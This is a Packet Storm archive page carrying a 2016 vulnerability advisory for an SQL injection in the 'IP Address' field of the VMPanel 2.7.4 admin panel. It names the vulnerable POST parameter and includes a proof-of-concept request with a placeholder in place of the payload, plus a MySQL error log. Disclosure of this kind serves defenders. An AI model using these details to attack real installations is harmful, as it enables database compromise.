Twenty Year Anniversary

VMPanel 2.7.4 SQL Injection

VMPanel 2.7.4 SQL Injection
Posted Dec 15, 2016
Authored by ZwX

VMPanel version 2.7.4 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | b099ad47c1961c838930a6ff111ddc4f

VMPanel 2.7.4 SQL Injection

Change Mirror Download
=====================================================
[#] Exploit Title : VMPanel 2.7.4 - SQL Injection Web Vulnerability
[#] Author : Esmaeil Rahimian
[#] Date Discovered : 2016-12-07
[#] Affected Product(s): VMPanel v2.7.4 - Content Management System
[#] Exploitation Technique: Remote
[#] Severity Level: Medium
[#] Tested OS : Windows 10
=====================================================


[#] Product & Service Introduction:
===================================
VMPanel is a powerful web based VMware Esx/Esxi Control Panel + WHMCS addon
with VMPanel you can create or remove virtual machines remotely without the need to access vsphere Client aslo you can
Power Off,Power On, reset,virtual machine through the panel and module for WHMCS

(Copy of the Vendor Homepage: http://www.cybervm.com/ )


[#] Technical Details & Description:
====================================
A remote sql injection web vulnerability has been discovered in the official VMPanel v2.7.4 web-application (cms).
The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the web-application or dbms.

The sql-injection web vulnerability is located in the `IP Address` entry name, that is located in the pannel administration.
Remote attackers are able to run clean sql commands, the vulnerability attack vector is application-side and
the injection request method is POST.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] (Input)

Vulnerable Parameter(s):
[+] IP Address


[#] Proof of Concept (PoC):
===========================
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: localhost:2023
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:2023/sesswuzs6ugfaxa7ufii/index.php?act=addserver
Cookie: head_ippool=2; head_storage=2; head_servers=2; ssupp.vid=UMvYqzxZJxPU8VfwJ23WTpt5PWxnqZmYHQ45341807122016; ssupp.geoloc=%7B%22ipAddress%22%3A%22176.156.184.208%22%2C%22countryCode%22%3A%22FR%22%2C%22country%22%3A%22France%22%2C%22region%22%3Anull%2C%22city%22%3Anull%7D; WHMCS4tXQk3bQ4YHY=l8580de1p2dm64gtevt7jj15s7; SIMCookies001_sid=yd0da41j3abie5zhb8jwjsd5nk6c07ce
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 141


POST Method: server_name=&ip=[INJECTION SQL HERE]&pass=&mikip=&mikuser=&mikpass=&bw=&addserver=Add+Server


--- PoC Error Logs ---
SELECT * FROM `servers` WHERE `server_ip` = ''"/>>:22'
MySQL Error No : 1064
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"/>>:22'' at line 1


[#] Disclaimer:
===============
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


Domain: www.zwx.fr
Contact: msk4@live.fr
Social: twitter.com/XSSed.fr
Feeds: www.zwx.fr/feed/
Advisory: www.vulnerability-lab.com/show.php?user=ZwX
packetstormsecurity.com/files/author/12026/
cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
0day.today/author/27461


Copyright (c) 2016 | ZwX - Security Researcher (Software & web application)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    7 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close